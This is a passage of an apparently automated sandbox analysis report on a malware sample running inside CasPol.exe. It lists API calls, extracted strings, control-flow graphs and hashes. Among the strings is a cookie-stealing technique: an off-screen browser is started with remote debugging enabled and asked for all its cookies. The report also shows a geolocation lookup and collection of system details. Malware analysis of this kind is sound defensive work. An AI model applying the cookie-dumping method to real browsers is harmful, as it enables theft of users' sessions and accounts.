                                                                                                                                                                                                                                    • Part of subcall function 100076D0: CloseHandle.KERNEL32(00000000), ref: 1000774F
                                                                                                                                                                                                                                  • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,?,?,?,?), ref: 1000279E
                                                                                                                                                                                                                                  • Sleep.KERNEL32(0000000A,100278DE,00000000,?,?,?,?), ref: 100028D2
                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 10002A9D
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?), ref: 10002AAB
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 10002ABA
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 10002ABF
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • localhost, xrefs: 1000296F
                                                                                                                                                                                                                                  • --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory=", xrefs: 10002737
                                                                                                                                                                                                                                  • localhost, xrefs: 10002A48
                                                                                                                                                                                                                                  • {"id":2,"method":"Browser.close"}, xrefs: 10002A3B
                                                                                                                                                                                                                                  • {"id":1,"method":"Network.getAllCookies","params":{}}, xrefs: 10002962
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseHandle$CreateProcess$FirstObjectProcess32SingleSleepSnapshotTerminateToolhelp32Wait
                                                                                                                                                                                                                                  • String ID: --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="$localhost$localhost${"id":1,"method":"Network.getAllCookies","params":{}}${"id":2,"method":"Browser.close"}
                                                                                                                                                                                                                                  • API String ID: 3739829977-2677655338
                                                                                                                                                                                                                                  • Opcode ID: a8493153503855f6f9aab56b26d4e52f0d5b721a9f897e61feb5301597870884
                                                                                                                                                                                                                                  • Instruction ID: 11f8c4d24fe82a6f86681b1c4a37eeeb5123bf1d696f215f8944f13cdd62a5a1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8493153503855f6f9aab56b26d4e52f0d5b721a9f897e61feb5301597870884
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7DC1E974D00248DEFF15DBA4DC85BEEBBB5EF05384F108159E40AA325ADB316E45CB62
                                                                                                                                                                                                                                  Function 0040428C Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 147networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1646 40428c-4042ad connect 1647 4043e1-4043e5 1646->1647 1648 4042b3-4042b6 1646->1648 1651 4043e7-4043f5 WSAGetLastError 1647->1651 1652 40445f 1647->1652 1649 4043da-4043dc 1648->1649 1650 4042bc-4042bf 1648->1650 1653 404461-404465 1649->1653 1654 4042c1-4042e8 call 404cbf call 401f66 call 41a686 1650->1654 1655 4042eb-4042f5 call 420151 1650->1655 1651->1652 1656 4043f7-4043fa 1651->1656 1652->1653 1654->1655 1665 404306-404313 call 420373 1655->1665 1666 4042f7-404301 1655->1666 1659 404439-40443e 1656->1659 1660 4043fc-404437 call 41bc76 call 404c9e call 401f66 call 41a686 call 401eea 1656->1660 1662 404443-40445c call 401f66 * 2 call 41a686 1659->1662 1660->1652 1662->1652 1679 404315-404338 call 401f66 * 2 call 41a686 1665->1679 1680 40434c-404357 call 420f34 1665->1680 1666->1662 1709 40433b-404347 call 420191 1679->1709 1692 404389-404396 call 4202ea 1680->1692 1693 404359-404387 call 401f66 * 2 call 41a686 call 420592 1680->1693 1705 404398-4043bb call 401f66 * 2 call 41a686 1692->1705 1706 4043be-4043d7 CreateEventW * 2 1692->1706 1693->1709 1705->1706 1706->1649 1709->1652
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • connect.WS2_32(?,00F5D160,00000010), ref: 004042A5
                                                                                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                                                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                                                                                                                                                                                                  • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                                                                                                                                                                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                                                                                                                                                  • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                                                                                                                                                  • API String ID: 994465650-2151626615
                                                                                                                                                                                                                                  • Opcode ID: 601579635915e11b10fdb855f4929282a74361c00447f006b68d65304df4c896
                                                                                                                                                                                                                                  • Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 601579635915e11b10fdb855f4929282a74361c00447f006b68d65304df4c896
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF
                                                                                                                                                                                                                                  Function 004047EB Relevance: 18.1, APIs: 12, Instructions: 66synchronizationCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                                                                                                                                                                  • closesocket.WS2_32(000000FF), ref: 0040481F
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3658366068-0
                                                                                                                                                                                                                                  • Opcode ID: c0811b9552baa960996580efd3a95ddbe219791cb6e29288b5199f5b52bda897
                                                                                                                                                                                                                                  • Instruction ID: 5504d0c870acfe65fd0076db90b097e51f0e6d2514c589c74abed5ba37c9c78a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c0811b9552baa960996580efd3a95ddbe219791cb6e29288b5199f5b52bda897
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C212C71104B149FCB216B26EC45A27BBE1EF40325F104A7EF2E612AF1CB76E851DB48
                                                                                                                                                                                                                                  Function 0040C89E Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1738 40c89e-40c8c3 call 401e52 1741 40c8c9 1738->1741 1742 40c9ed-40ca85 call 401e07 GetLongPathNameW call 403b40 * 2 call 40cc37 call 402860 * 2 call 401e13 * 5 1738->1742 1744 40c8d0-40c8d5 1741->1744 1745 40c9c2-40c9c7 1741->1745 1746 40c905-40c90a 1741->1746 1747 40c9d8 1741->1747 1748 40c9c9-40c9ce call 43ac0f 1741->1748 1749 40c8da-40c8e8 call 41a74b call 401e18 1741->1749 1750 40c8fb-40c900 1741->1750 1751 40c9bb-40c9c0 1741->1751 1752 40c90f-40c916 call 41b15b 1741->1752 1754 40c9dd-40c9e2 call 43ac0f 1744->1754 1745->1754 1746->1754 1747->1754 1760 40c9d3-40c9d6 1748->1760 1773 40c8ed 1749->1773 1750->1754 1751->1754 1764 40c918-40c968 call 403b40 call 43ac0f call 403b40 call 402860 call 401e18 call 401e13 * 2 1752->1764 1765 40c96a-40c9b6 call 403b40 call 43ac0f call 403b40 call 402860 call 401e18 call 401e13 * 2 1752->1765 1766 40c9e3-40c9e8 call 4082d7 1754->1766 1760->1747 1760->1766 1774 40c8f1-40c8f6 call 401e13 1764->1774 1765->1773 1766->1742 1773->1774 1774->1742
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LongNamePath
                                                                                                                                                                                                                                  • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                                                                                                                                                  • API String ID: 82841172-425784914
                                                                                                                                                                                                                                  • Opcode ID: a9c7120ea0ae85f4d8bb92ab4d668114329b205a5d777d04df1454f3d5f9280f
                                                                                                                                                                                                                                  • Instruction ID: 51cedb133b73bca78a9fc1065318242b3d6e678e936cb09da4a185c9a299c852
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a9c7120ea0ae85f4d8bb92ab4d668114329b205a5d777d04df1454f3d5f9280f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 39413A721442009BC214FB21DD96DAFB7A4AE90759F10063FB546720E2EE7CAA49C69F
                                                                                                                                                                                                                                  Function 100067D0 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 277COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 10006845
                                                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 10006904
                                                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 10006A19
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExistsFilePath
                                                                                                                                                                                                                                  • String ID: Default$Default$Profile $User Data\Default$User Data\Profile $\Default
                                                                                                                                                                                                                                  • API String ID: 1174141254-1565956251
                                                                                                                                                                                                                                  • Opcode ID: 23bab477671af1dc14b169766e0ac29bc56a45cbfc4cf51a7bbc5a01153a05bb
                                                                                                                                                                                                                                  • Instruction ID: a37d211fa08ad78f2eb18696fba1f90168a005bfae744a9f2f60b4d9e59cb154
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 23bab477671af1dc14b169766e0ac29bc56a45cbfc4cf51a7bbc5a01153a05bb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82A16DB4D00248DEEF01DBA4DC85BEEBBBAFF48344F208019E415E7255DB34AA45CBA1
                                                                                                                                                                                                                                  Function 100025A0 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 157COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • localhost, xrefs: 1000296F
                                                                                                                                                                                                                                  • D, xrefs: 1000263C
                                                                                                                                                                                                                                  • --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory=", xrefs: 10002737
                                                                                                                                                                                                                                  • {"id":1,"method":"Network.getAllCookies","params":{}}, xrefs: 10002962
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="$D$localhost${"id":1,"method":"Network.getAllCookies","params":{}}
                                                                                                                                                                                                                                  • API String ID: 0-36197314
                                                                                                                                                                                                                                  • Opcode ID: c2d3aa22fbaa631a7903eb1ae554ed7ed7e75fe155870fb2b8e401e179505af5
                                                                                                                                                                                                                                  • Instruction ID: 40ccbdec88be9962e706eaa5533df9936f7b939966369cc920347d0ed5184c3d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2d3aa22fbaa631a7903eb1ae554ed7ed7e75fe155870fb2b8e401e179505af5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E8515C74D05258EEEB61CBA4CC85BDEBBB4EF14344F208199E40DA3295EB746A88CF51
                                                                                                                                                                                                                                  Function 100085D8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71networkwindowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • getaddrinfo.WS2_32(?,00000010,?,?), ref: 100085F0
                                                                                                                                                                                                                                  • FormatMessageA.KERNEL32(000012FF,00000000,00000000,00000400,1002C4F0,00000400,00000000,?,00000010,?,?), ref: 10008613
                                                                                                                                                                                                                                  • socket.WS2_32(?,?,?), ref: 10008659
                                                                                                                                                                                                                                  • connect.WS2_32(00000000,?,?), ref: 1000866D
                                                                                                                                                                                                                                  • closesocket.WS2_32(00000000), ref: 10008679
                                                                                                                                                                                                                                  • FreeAddrInfoW.WS2_32(?), ref: 10008689
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddrFormatFreeInfoMessageclosesocketconnectgetaddrinfosocket
                                                                                                                                                                                                                                  • String ID: getaddrinfo: %s
                                                                                                                                                                                                                                  • API String ID: 1733616599-4118680637
                                                                                                                                                                                                                                  • Opcode ID: 2c738af1012253b4d1f1cfc086a1553b903a96f3a37eb19fe2757ed9f79e3473
                                                                                                                                                                                                                                  • Instruction ID: ba985bc0003f028ac4b4e599035e3f0603eaa92aeb31a9206ee88384ba24f580
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c738af1012253b4d1f1cfc086a1553b903a96f3a37eb19fe2757ed9f79e3473
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E411E432A01614BBFB20DBA09C45F9E73A9FB44764F210619FB69A31D0C732BA168795
                                                                                                                                                                                                                                  Function 10007890 Relevance: 12.2, APIs: 8, Instructions: 154processthreadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 100078AF
                                                                                                                                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 100078D1
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 100078DC
                                                                                                                                                                                                                                  • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 100079D8
                                                                                                                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 100079EC
                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 100079FA
                                                                                                                                                                                                                                  • Process32NextW.KERNEL32(?,0000022C), ref: 10007A1B
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 10007A2D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$CloseHandleProcess32$CreateFindFirstNextProcessShowSnapshotThreadToolhelp32
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3779799082-0
                                                                                                                                                                                                                                  • Opcode ID: e52270b00a648155402b89675e6d7e062810d99c949bb7e50b232112364f9da3
                                                                                                                                                                                                                                  • Instruction ID: 2a0021c97947e2911aefd651af9cf86dd4725709f7f3ac61b73b067665f658f9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e52270b00a648155402b89675e6d7e062810d99c949bb7e50b232112364f9da3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6951A432E0022A9BEB21CFA4CC84BAEB7B5FF45794F214259DD19B7284D7345E42CB91
                                                                                                                                                                                                                                  Function 0041A51B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68networkfileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                                                                                                                                                                                                                                  • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0041A5B3
                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0041A5B6
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • http://geoplugin.net/json.gp, xrefs: 0041A54E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                                                                                                                                                  • String ID: http://geoplugin.net/json.gp
                                                                                                                                                                                                                                  • API String ID: 3121278467-91888290
                                                                                                                                                                                                                                  • Opcode ID: 58e0756728f203ec97268b0f46e50b18b277bb6d4a0c3044900633d2ea456da7
                                                                                                                                                                                                                                  • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 58e0756728f203ec97268b0f46e50b18b277bb6d4a0c3044900633d2ea456da7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6
                                                                                                                                                                                                                                  Function 0041A463 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                                                                                                                                                    • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                                                                                                                                                                                                                                    • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                                                                                                                                    • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                                                                                                                                    • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                                                                                                                                  • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                                                                                                                                                                                  • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                                                                                  • API String ID: 782494840-2070987746
                                                                                                                                                                                                                                  • Opcode ID: 7198dbf691e5a7bb892ac66aa4501a564f66fafa71d7430043580709aebb250a
                                                                                                                                                                                                                                  • Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7198dbf691e5a7bb892ac66aa4501a564f66fafa71d7430043580709aebb250a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE
                                                                                                                                                                                                                                  Function 1002179D Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(10021794), ref: 1002179D
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,10021794), ref: 100217EF
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 10021817
                                                                                                                                                                                                                                    • Part of subcall function 100217BA: GetProcAddress.KERNEL32(00000000,100217AB), ref: 100217BB
